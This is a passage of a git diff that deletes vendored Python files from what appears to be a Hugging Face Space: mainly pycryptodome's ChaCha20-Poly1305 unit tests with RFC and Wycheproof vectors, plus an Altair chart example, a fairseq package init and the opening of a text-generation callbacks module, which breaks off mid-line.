b/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/Crypto/SelfTest/Cipher/test_ChaCha20_Poly1305.py deleted file mode 100644 index 67440d76b5803563de7f1bd32f69c45cd498e2d9..0000000000000000000000000000000000000000 --- a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/Crypto/SelfTest/Cipher/test_ChaCha20_Poly1305.py +++ /dev/null @@ -1,770 +0,0 @@ -# =================================================================== -# -# Copyright (c) 2018, Helder Eijs -# All rights reserved. -# -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions -# are met: -# -# 1. Redistributions of source code must retain the above copyright -# notice, this list of conditions and the following disclaimer. -# 2. Redistributions in binary form must reproduce the above copyright -# notice, this list of conditions and the following disclaimer in -# the documentation and/or other materials provided with the -# distribution. -# -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS -# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE -# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, -# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, -# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER -# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT -# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN -# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -# POSSIBILITY OF SUCH DAMAGE. -# =================================================================== - -import unittest -from binascii import unhexlify - -from Crypto.SelfTest.st_common import list_test_cases -from Crypto.SelfTest.loader import load_test_vectors_wycheproof -from Crypto.Util.py3compat import tobytes -from Crypto.Cipher import ChaCha20_Poly1305 -from Crypto.Hash import SHAKE128 - -from Crypto.Util._file_system import pycryptodome_filename -from Crypto.Util.strxor import strxor - - -def get_tag_random(tag, length): - return SHAKE128.new(data=tobytes(tag)).read(length) - - -class ChaCha20Poly1305Tests(unittest.TestCase): - - key_256 = get_tag_random("key_256", 32) - nonce_96 = get_tag_random("nonce_96", 12) - data_128 = get_tag_random("data_128", 16) - - def test_loopback(self): - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - pt = get_tag_random("plaintext", 16 * 100) - ct = cipher.encrypt(pt) - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - pt2 = cipher.decrypt(ct) - self.assertEqual(pt, pt2) - - def test_nonce(self): - # Nonce can only be 8 or 12 bytes - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=b'H' * 8) - self.assertEqual(len(cipher.nonce), 8) - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=b'H' * 12) - self.assertEqual(len(cipher.nonce), 12) - - # If not passed, the nonce is created randomly - cipher = ChaCha20_Poly1305.new(key=self.key_256) - nonce1 = cipher.nonce - cipher = ChaCha20_Poly1305.new(key=self.key_256) - nonce2 = cipher.nonce - self.assertEqual(len(nonce1), 12) - self.assertNotEqual(nonce1, nonce2) - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - ct = cipher.encrypt(self.data_128) - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - self.assertEqual(ct, cipher.encrypt(self.data_128)) - - def test_nonce_must_be_bytes(self): - self.assertRaises(TypeError, - ChaCha20_Poly1305.new, - key=self.key_256, - nonce=u'test12345678') - - def test_nonce_length(self): - # nonce can only be 8 or 12 bytes long - self.assertRaises(ValueError, - ChaCha20_Poly1305.new, - key=self.key_256, - nonce=b'0' * 7) - self.assertRaises(ValueError, - ChaCha20_Poly1305.new, - key=self.key_256, - nonce=b'') - - def test_block_size(self): - # Not based on block ciphers - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - self.assertFalse(hasattr(cipher, 'block_size')) - - def test_nonce_attribute(self): - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - self.assertEqual(cipher.nonce, self.nonce_96) - - # By default, a 12 bytes long nonce is randomly generated - nonce1 = ChaCha20_Poly1305.new(key=self.key_256).nonce - nonce2 = ChaCha20_Poly1305.new(key=self.key_256).nonce - self.assertEqual(len(nonce1), 12) - self.assertNotEqual(nonce1, nonce2) - - def test_unknown_parameters(self): - self.assertRaises(TypeError, - ChaCha20_Poly1305.new, - key=self.key_256, - param=9) - - def test_null_encryption_decryption(self): - for func in "encrypt", "decrypt": - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - result = getattr(cipher, func)(b"") - self.assertEqual(result, b"") - - def test_either_encrypt_or_decrypt(self): - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.encrypt(b"") - self.assertRaises(TypeError, cipher.decrypt, b"") - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.decrypt(b"") - self.assertRaises(TypeError, cipher.encrypt, b"") - - def test_data_must_be_bytes(self): - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - self.assertRaises(TypeError, cipher.encrypt, u'test1234567890-*') - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - self.assertRaises(TypeError, cipher.decrypt, u'test1234567890-*') - - def test_mac_len(self): - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - _, mac = cipher.encrypt_and_digest(self.data_128) - self.assertEqual(len(mac), 16) - - def test_invalid_mac(self): - from Crypto.Util.strxor import strxor_c - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - ct, mac = cipher.encrypt_and_digest(self.data_128) - - invalid_mac = strxor_c(mac, 0x01) - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - self.assertRaises(ValueError, cipher.decrypt_and_verify, ct, - invalid_mac) - - def test_hex_mac(self): - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - mac_hex = cipher.hexdigest() - self.assertEqual(cipher.digest(), unhexlify(mac_hex)) - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.hexverify(mac_hex) - - def test_message_chunks(self): - # Validate that both associated data and plaintext/ciphertext - # can be broken up in chunks of arbitrary length - - auth_data = get_tag_random("authenticated data", 127) - plaintext = get_tag_random("plaintext", 127) - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.update(auth_data) - ciphertext, ref_mac = cipher.encrypt_and_digest(plaintext) - - def break_up(data, chunk_length): - return [data[i:i+chunk_length] for i in range(0, len(data), - chunk_length)] - - # Encryption - for chunk_length in 1, 2, 3, 7, 10, 13, 16, 40, 80, 128: - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - - for chunk in break_up(auth_data, chunk_length): - cipher.update(chunk) - pt2 = b"" - for chunk in break_up(ciphertext, chunk_length): - pt2 += cipher.decrypt(chunk) - self.assertEqual(plaintext, pt2) - cipher.verify(ref_mac) - - # Decryption - for chunk_length in 1, 2, 3, 7, 10, 13, 16, 40, 80, 128: - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - - for chunk in break_up(auth_data, chunk_length): - cipher.update(chunk) - ct2 = b"" - for chunk in break_up(plaintext, chunk_length): - ct2 += cipher.encrypt(chunk) - self.assertEqual(ciphertext, ct2) - self.assertEqual(cipher.digest(), ref_mac) - - def test_bytearray(self): - - # Encrypt - key_ba = bytearray(self.key_256) - nonce_ba = bytearray(self.nonce_96) - header_ba = bytearray(self.data_128) - data_ba = bytearray(self.data_128) - - cipher1 = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher1.update(self.data_128) - ct = cipher1.encrypt(self.data_128) - tag = cipher1.digest() - - cipher2 = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - key_ba[:3] = b'\xFF\xFF\xFF' - nonce_ba[:3] = b'\xFF\xFF\xFF' - cipher2.update(header_ba) - header_ba[:3] = b'\xFF\xFF\xFF' - ct_test = cipher2.encrypt(data_ba) - data_ba[:3] = b'\x99\x99\x99' - tag_test = cipher2.digest() - - self.assertEqual(ct, ct_test) - self.assertEqual(tag, tag_test) - self.assertEqual(cipher1.nonce, cipher2.nonce) - - # Decrypt - key_ba = bytearray(self.key_256) - nonce_ba = bytearray(self.nonce_96) - header_ba = bytearray(self.data_128) - ct_ba = bytearray(ct) - tag_ba = bytearray(tag) - del data_ba - - cipher3 = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - key_ba[:3] = b'\xFF\xFF\xFF' - nonce_ba[:3] = b'\xFF\xFF\xFF' - cipher3.update(header_ba) - header_ba[:3] = b'\xFF\xFF\xFF' - pt_test = cipher3.decrypt(ct_ba) - ct_ba[:3] = b'\xFF\xFF\xFF' - cipher3.verify(tag_ba) - - self.assertEqual(pt_test, self.data_128) - - def test_memoryview(self): - - # Encrypt - key_mv = memoryview(bytearray(self.key_256)) - nonce_mv = memoryview(bytearray(self.nonce_96)) - header_mv = memoryview(bytearray(self.data_128)) - data_mv = memoryview(bytearray(self.data_128)) - - cipher1 = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher1.update(self.data_128) - ct = cipher1.encrypt(self.data_128) - tag = cipher1.digest() - - cipher2 = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - key_mv[:3] = b'\xFF\xFF\xFF' - nonce_mv[:3] = b'\xFF\xFF\xFF' - cipher2.update(header_mv) - header_mv[:3] = b'\xFF\xFF\xFF' - ct_test = cipher2.encrypt(data_mv) - data_mv[:3] = b'\x99\x99\x99' - tag_test = cipher2.digest() - - self.assertEqual(ct, ct_test) - self.assertEqual(tag, tag_test) - self.assertEqual(cipher1.nonce, cipher2.nonce) - - # Decrypt - key_mv = memoryview(bytearray(self.key_256)) - nonce_mv = memoryview(bytearray(self.nonce_96)) - header_mv = memoryview(bytearray(self.data_128)) - ct_mv = memoryview(bytearray(ct)) - tag_mv = memoryview(bytearray(tag)) - del data_mv - - cipher3 = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - key_mv[:3] = b'\xFF\xFF\xFF' - nonce_mv[:3] = b'\xFF\xFF\xFF' - cipher3.update(header_mv) - header_mv[:3] = b'\xFF\xFF\xFF' - pt_test = cipher3.decrypt(ct_mv) - ct_mv[:3] = b'\x99\x99\x99' - cipher3.verify(tag_mv) - - self.assertEqual(pt_test, self.data_128) - - -class XChaCha20Poly1305Tests(unittest.TestCase): - - def test_encrypt(self): - # From https://tools.ietf.org/html/draft-arciszewski-xchacha-03 - # Section A.3.1 - - pt = b""" - 4c616469657320616e642047656e746c656d656e206f662074686520636c6173 - 73206f66202739393a204966204920636f756c64206f6666657220796f75206f - 6e6c79206f6e652074697020666f7220746865206675747572652c2073756e73 - 637265656e20776f756c642062652069742e""" - pt = unhexlify(pt.replace(b"\n", b"").replace(b" ", b"")) - - aad = unhexlify(b"50515253c0c1c2c3c4c5c6c7") - key = unhexlify(b"808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9f") - iv = unhexlify(b"404142434445464748494a4b4c4d4e4f5051525354555657") - - ct = b""" - bd6d179d3e83d43b9576579493c0e939572a1700252bfaccbed2902c21396cbb - 731c7f1b0b4aa6440bf3a82f4eda7e39ae64c6708c54c216cb96b72e1213b452 - 2f8c9ba40db5d945b11b69b982c1bb9e3f3fac2bc369488f76b2383565d3fff9 - 21f9664c97637da9768812f615c68b13b52e""" - ct = unhexlify(ct.replace(b"\n", b"").replace(b" ", b"")) - - tag = unhexlify(b"c0875924c1c7987947deafd8780acf49") - - cipher = ChaCha20_Poly1305.new(key=key, nonce=iv) - cipher.update(aad) - ct_test, tag_test = cipher.encrypt_and_digest(pt) - - self.assertEqual(ct, ct_test) - self.assertEqual(tag, tag_test) - - cipher = ChaCha20_Poly1305.new(key=key, nonce=iv) - cipher.update(aad) - cipher.decrypt_and_verify(ct, tag) - - -class ChaCha20Poly1305FSMTests(unittest.TestCase): - - key_256 = get_tag_random("key_256", 32) - nonce_96 = get_tag_random("nonce_96", 12) - data_128 = get_tag_random("data_128", 16) - - def test_valid_init_encrypt_decrypt_digest_verify(self): - # No authenticated data, fixed plaintext - # Verify path INIT->ENCRYPT->DIGEST - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - ct = cipher.encrypt(self.data_128) - mac = cipher.digest() - - # Verify path INIT->DECRYPT->VERIFY - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.decrypt(ct) - cipher.verify(mac) - - def test_valid_init_update_digest_verify(self): - # No plaintext, fixed authenticated data - # Verify path INIT->UPDATE->DIGEST - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.update(self.data_128) - mac = cipher.digest() - - # Verify path INIT->UPDATE->VERIFY - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.update(self.data_128) - cipher.verify(mac) - - def test_valid_full_path(self): - # Fixed authenticated data, fixed plaintext - # Verify path INIT->UPDATE->ENCRYPT->DIGEST - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.update(self.data_128) - ct = cipher.encrypt(self.data_128) - mac = cipher.digest() - - # Verify path INIT->UPDATE->DECRYPT->VERIFY - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.update(self.data_128) - cipher.decrypt(ct) - cipher.verify(mac) - - def test_valid_init_digest(self): - # Verify path INIT->DIGEST - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.digest() - - def test_valid_init_verify(self): - # Verify path INIT->VERIFY - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - mac = cipher.digest() - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.verify(mac) - - def test_valid_multiple_encrypt_or_decrypt(self): - for method_name in "encrypt", "decrypt": - for auth_data in (None, b"333", self.data_128, - self.data_128 + b"3"): - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - if auth_data is not None: - cipher.update(auth_data) - method = getattr(cipher, method_name) - method(self.data_128) - method(self.data_128) - method(self.data_128) - method(self.data_128) - - def test_valid_multiple_digest_or_verify(self): - # Multiple calls to digest - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.update(self.data_128) - first_mac = cipher.digest() - for x in range(4): - self.assertEqual(first_mac, cipher.digest()) - - # Multiple calls to verify - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.update(self.data_128) - for x in range(5): - cipher.verify(first_mac) - - def test_valid_encrypt_and_digest_decrypt_and_verify(self): - # encrypt_and_digest - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.update(self.data_128) - ct, mac = cipher.encrypt_and_digest(self.data_128) - - # decrypt_and_verify - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.update(self.data_128) - pt = cipher.decrypt_and_verify(ct, mac) - self.assertEqual(self.data_128, pt) - - def test_invalid_mixing_encrypt_decrypt(self): - # Once per method, with or without assoc. data - for method1_name, method2_name in (("encrypt", "decrypt"), - ("decrypt", "encrypt")): - for assoc_data_present in (True, False): - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - if assoc_data_present: - cipher.update(self.data_128) - getattr(cipher, method1_name)(self.data_128) - self.assertRaises(TypeError, getattr(cipher, method2_name), - self.data_128) - - def test_invalid_encrypt_or_update_after_digest(self): - for method_name in "encrypt", "update": - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.encrypt(self.data_128) - cipher.digest() - self.assertRaises(TypeError, getattr(cipher, method_name), - self.data_128) - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.encrypt_and_digest(self.data_128) - - def test_invalid_decrypt_or_update_after_verify(self): - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - ct = cipher.encrypt(self.data_128) - mac = cipher.digest() - - for method_name in "decrypt", "update": - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.decrypt(ct) - cipher.verify(mac) - self.assertRaises(TypeError, getattr(cipher, method_name), - self.data_128) - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.decrypt(ct) - cipher.verify(mac) - self.assertRaises(TypeError, getattr(cipher, method_name), - self.data_128) - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.decrypt_and_verify(ct, mac) - self.assertRaises(TypeError, getattr(cipher, method_name), - self.data_128) - - -def compact(x): - return unhexlify(x.replace(" ", "").replace(":", "")) - - -class TestVectorsRFC(unittest.TestCase): - """Test cases from RFC7539""" - - # AAD, PT, CT, MAC, KEY, NONCE - test_vectors_hex = [ - ( '50 51 52 53 c0 c1 c2 c3 c4 c5 c6 c7', - '4c 61 64 69 65 73 20 61 6e 64 20 47 65 6e 74 6c' - '65 6d 65 6e 20 6f 66 20 74 68 65 20 63 6c 61 73' - '73 20 6f 66 20 27 39 39 3a 20 49 66 20 49 20 63' - '6f 75 6c 64 20 6f 66 66 65 72 20 79 6f 75 20 6f' - '6e 6c 79 20 6f 6e 65 20 74 69 70 20 66 6f 72 20' - '74 68 65 20 66 75 74 75 72 65 2c 20 73 75 6e 73' - '63 72 65 65 6e 20 77 6f 75 6c 64 20 62 65 20 69' - '74 2e', - 'd3 1a 8d 34 64 8e 60 db 7b 86 af bc 53 ef 7e c2' - 'a4 ad ed 51 29 6e 08 fe a9 e2 b5 a7 36 ee 62 d6' - '3d be a4 5e 8c a9 67 12 82 fa fb 69 da 92 72 8b' - '1a 71 de 0a 9e 06 0b 29 05 d6 a5 b6 7e cd 3b 36' - '92 dd bd 7f 2d 77 8b 8c 98 03 ae e3 28 09 1b 58' - 'fa b3 24 e4 fa d6 75 94 55 85 80 8b 48 31 d7 bc' - '3f f4 de f0 8e 4b 7a 9d e5 76 d2 65 86 ce c6 4b' - '61 16', - '1a:e1:0b:59:4f:09:e2:6a:7e:90:2e:cb:d0:60:06:91', - '80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f' - '90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f', - '07 00 00 00' + '40 41 42 43 44 45 46 47', - ), - ( 'f3 33 88 86 00 00 00 00 00 00 4e 91', - '49 6e 74 65 72 6e 65 74 2d 44 72 61 66 74 73 20' - '61 72 65 20 64 72 61 66 74 20 64 6f 63 75 6d 65' - '6e 74 73 20 76 61 6c 69 64 20 66 6f 72 20 61 20' - '6d 61 78 69 6d 75 6d 20 6f 66 20 73 69 78 20 6d' - '6f 6e 74 68 73 20 61 6e 64 20 6d 61 79 20 62 65' - '20 75 70 64 61 74 65 64 2c 20 72 65 70 6c 61 63' - '65 64 2c 20 6f 72 20 6f 62 73 6f 6c 65 74 65 64' - '20 62 79 20 6f 74 68 65 72 20 64 6f 63 75 6d 65' - '6e 74 73 20 61 74 20 61 6e 79 20 74 69 6d 65 2e' - '20 49 74 20 69 73 20 69 6e 61 70 70 72 6f 70 72' - '69 61 74 65 20 74 6f 20 75 73 65 20 49 6e 74 65' - '72 6e 65 74 2d 44 72 61 66 74 73 20 61 73 20 72' - '65 66 65 72 65 6e 63 65 20 6d 61 74 65 72 69 61' - '6c 20 6f 72 20 74 6f 20 63 69 74 65 20 74 68 65' - '6d 20 6f 74 68 65 72 20 74 68 61 6e 20 61 73 20' - '2f e2 80 9c 77 6f 72 6b 20 69 6e 20 70 72 6f 67' - '72 65 73 73 2e 2f e2 80 9d', - '64 a0 86 15 75 86 1a f4 60 f0 62 c7 9b e6 43 bd' - '5e 80 5c fd 34 5c f3 89 f1 08 67 0a c7 6c 8c b2' - '4c 6c fc 18 75 5d 43 ee a0 9e e9 4e 38 2d 26 b0' - 'bd b7 b7 3c 32 1b 01 00 d4 f0 3b 7f 35 58 94 cf' - '33 2f 83 0e 71 0b 97 ce 98 c8 a8 4a bd 0b 94 81' - '14 ad 17 6e 00 8d 33 bd 60 f9 82 b1 ff 37 c8 55' - '97 97 a0 6e f4 f0 ef 61 c1 86 32 4e 2b 35 06 38' - '36 06 90 7b 6a 7c 02 b0 f9 f6 15 7b 53 c8 67 e4' - 'b9 16 6c 76 7b 80 4d 46 a5 9b 52 16 cd e7 a4 e9' - '90 40 c5 a4 04 33 22 5e e2 82 a1 b0 a0 6c 52 3e' - 'af 45 34 d7 f8 3f a1 15 5b 00 47 71 8c bc 54 6a' - '0d 07 2b 04 b3 56 4e ea 1b 42 22 73 f5 48 27 1a' - '0b b2 31 60 53 fa 76 99 19 55 eb d6 31 59 43 4e' - 'ce bb 4e 46 6d ae 5a 10 73 a6 72 76 27 09 7a 10' - '49 e6 17 d9 1d 36 10 94 fa 68 f0 ff 77 98 71 30' - '30 5b ea ba 2e da 04 df 99 7b 71 4d 6c 6f 2c 29' - 'a6 ad 5c b4 02 2b 02 70 9b', - 'ee ad 9d 67 89 0c bb 22 39 23 36 fe a1 85 1f 38', - '1c 92 40 a5 eb 55 d3 8a f3 33 88 86 04 f6 b5 f0' - '47 39 17 c1 40 2b 80 09 9d ca 5c bc 20 70 75 c0', - '00 00 00 00 01 02 03 04 05 06 07 08', - ) - ] - - test_vectors = [[unhexlify(x.replace(" ","").replace(":","")) for x in tv] for tv in test_vectors_hex] - - def runTest(self): - for assoc_data, pt, ct, mac, key, nonce in self.test_vectors: - # Encrypt - cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce) - cipher.update(assoc_data) - ct2, mac2 = cipher.encrypt_and_digest(pt) - self.assertEqual(ct, ct2) - self.assertEqual(mac, mac2) - - # Decrypt - cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce) - cipher.update(assoc_data) - pt2 = cipher.decrypt_and_verify(ct, mac) - self.assertEqual(pt, pt2) - - -class TestVectorsWycheproof(unittest.TestCase): - - def __init__(self, wycheproof_warnings): - unittest.TestCase.__init__(self) - self._wycheproof_warnings = wycheproof_warnings - self._id = "None" - - def load_tests(self, filename): - - def filter_tag(group): - return group['tagSize'] // 8 - - def filter_algo(root): - return root['algorithm'] - - result = load_test_vectors_wycheproof(("Cipher", "wycheproof"), - filename, - "Wycheproof ChaCha20-Poly1305", - root_tag={'algo': filter_algo}, - group_tag={'tag_size': filter_tag}) - return result - - def setUp(self): - self.tv = [] - self.tv.extend(self.load_tests("chacha20_poly1305_test.json")) - self.tv.extend(self.load_tests("xchacha20_poly1305_test.json")) - - def shortDescription(self): - return self._id - - def warn(self, tv): - if tv.warning and self._wycheproof_warnings: - import warnings - warnings.warn("Wycheproof warning: %s (%s)" % (self._id, tv.comment)) - - def test_encrypt(self, tv): - self._id = "Wycheproof Encrypt %s Test #%s" % (tv.algo, tv.id) - - try: - cipher = ChaCha20_Poly1305.new(key=tv.key, nonce=tv.iv) - except ValueError as e: - assert len(tv.iv) not in (8, 12) and "Nonce must be" in str(e) - return - - cipher.update(tv.aad) - ct, tag = cipher.encrypt_and_digest(tv.msg) - if tv.valid: - self.assertEqual(ct, tv.ct) - self.assertEqual(tag, tv.tag) - self.warn(tv) - - def test_decrypt(self, tv): - self._id = "Wycheproof Decrypt %s Test #%s" % (tv.algo, tv.id) - - try: - cipher = ChaCha20_Poly1305.new(key=tv.key, nonce=tv.iv) - except ValueError as e: - assert len(tv.iv) not in (8, 12) and "Nonce must be" in str(e) - return - - cipher.update(tv.aad) - try: - pt = cipher.decrypt_and_verify(tv.ct, tv.tag) - except ValueError: - assert not tv.valid - else: - assert tv.valid - self.assertEqual(pt, tv.msg) - self.warn(tv) - - def test_corrupt_decrypt(self, tv): - self._id = "Wycheproof Corrupt Decrypt ChaCha20-Poly1305 Test #" + str(tv.id) - if len(tv.iv) == 0 or len(tv.ct) < 1: - return - cipher = ChaCha20_Poly1305.new(key=tv.key, nonce=tv.iv) - cipher.update(tv.aad) - ct_corrupt = strxor(tv.ct, b"\x00" * (len(tv.ct) - 1) + b"\x01") - self.assertRaises(ValueError, cipher.decrypt_and_verify, ct_corrupt, tv.tag) - - def runTest(self): - - for tv in self.tv: - self.test_encrypt(tv) - self.test_decrypt(tv) - self.test_corrupt_decrypt(tv) - - -class TestOutput(unittest.TestCase): - - def runTest(self): - # Encrypt/Decrypt data and test output parameter - - key = b'4' * 32 - nonce = b'5' * 12 - cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce) - - pt = b'5' * 16 - ct = cipher.encrypt(pt) - - output = bytearray(16) - cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce) - res = cipher.encrypt(pt, output=output) - self.assertEqual(ct, output) - self.assertEqual(res, None) - - cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce) - res = cipher.decrypt(ct, output=output) - self.assertEqual(pt, output) - self.assertEqual(res, None) - - output = memoryview(bytearray(16)) - cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce) - cipher.encrypt(pt, output=output) - self.assertEqual(ct, output) - - cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce) - cipher.decrypt(ct, output=output) - self.assertEqual(pt, output) - - cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce) - self.assertRaises(TypeError, cipher.encrypt, pt, output=b'0'*16) - - cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce) - self.assertRaises(TypeError, cipher.decrypt, ct, output=b'0'*16) - - shorter_output = bytearray(7) - - cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce) - self.assertRaises(ValueError, cipher.encrypt, pt, output=shorter_output) - - cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce) - self.assertRaises(ValueError, cipher.decrypt, ct, output=shorter_output) - - -def get_tests(config={}): - wycheproof_warnings = config.get('wycheproof_warnings') - - tests = [] - tests += list_test_cases(ChaCha20Poly1305Tests) - tests += list_test_cases(XChaCha20Poly1305Tests) - tests += list_test_cases(ChaCha20Poly1305FSMTests) - tests += [TestVectorsRFC()] - tests += [TestVectorsWycheproof(wycheproof_warnings)] - tests += [TestOutput()] - return tests - - -if __name__ == '__main__': - def suite(): - unittest.TestSuite(get_tests()) - unittest.main(defaultTest='suite') diff --git a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/altair/examples/grouped_bar_chart_with_error_bars.py b/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/altair/examples/grouped_bar_chart_with_error_bars.py deleted file mode 100644 index c1eab965d7ec6a97360642d779589dd1882f3991..0000000000000000000000000000000000000000 --- a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/altair/examples/grouped_bar_chart_with_error_bars.py +++ /dev/null @@ -1,25 +0,0 @@ -""" -Grouped Bar Chart with Error Bars ---------------------------------- -This example shows a grouped bar chart with error bars. -""" -# category: bar charts -import altair as alt -from vega_datasets import data - -source = data.barley() - -bars = alt.Chart().mark_bar().encode( - x='year:O', - y=alt.Y('mean(yield):Q', title='Mean Yield'), - color='year:N', -) - -error_bars = alt.Chart().mark_errorbar(extent='ci').encode( - x='year:O', - y='yield:Q' -) - -alt.layer(bars, error_bars, data=source).facet( - column='site:N' -) diff --git a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/fairseq/data/legacy/__init__.py b/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/fairseq/data/legacy/__init__.py deleted file mode 100644 index 9bd5c72b5e9d7f67fb7e4ef10808d7ec08967ff4..0000000000000000000000000000000000000000 --- a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/fairseq/data/legacy/__init__.py +++ /dev/null @@ -1,16 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from .block_pair_dataset import BlockPairDataset -from .masked_lm_dataset import MaskedLMDataset -from .masked_lm_dictionary import BertDictionary, MaskedLMDictionary - - -__all__ = [ - "BertDictionary", - "BlockPairDataset", - "MaskedLMDataset", - "MaskedLMDictionary", -] diff --git a/spaces/ashercn97/AsherTesting/modules/callbacks.py b/spaces/ashercn97/AsherTesting/modules/callbacks.py deleted file mode 100644 index 1fa95e475f5e7f5936f55c6dc2848770621a1241..0000000000000000000000000000000000000000 --- a/spaces/ashercn97/AsherTesting/modules/callbacks.py +++ /dev/null @@ -1,94 +0,0 @@ -import gc -import traceback -from queue import Queue -from threading import Thread - -import torch -import transformers - -import modules.shared as shared - - -class _StopEverythingStoppingCriteria(transformers.StoppingCriteria): - def __init__(self): - transformers.StoppingCriteria.__init__(self) - - def __call__(self, input_ids: torch.LongTensor, _scores: torch.FloatTensor) -> bool: - return shared.stop_everything - - -class Stream(transformers.StoppingCriteria): - def __init__(self, callback_func=None): - self.callback_func = callback_func - - def __call__(self, input_ids, scores) -> bool: - if self.callback_func is not None: - self.callback_func(input_ids[0]) - return False - - -class Iteratorize: - - """ - Transforms a function that takes a callback - into a lazy iterator (generator). - - Adapted from: https://stackoverflow.com/a/9969000 - """ - - def __init__(self, func, 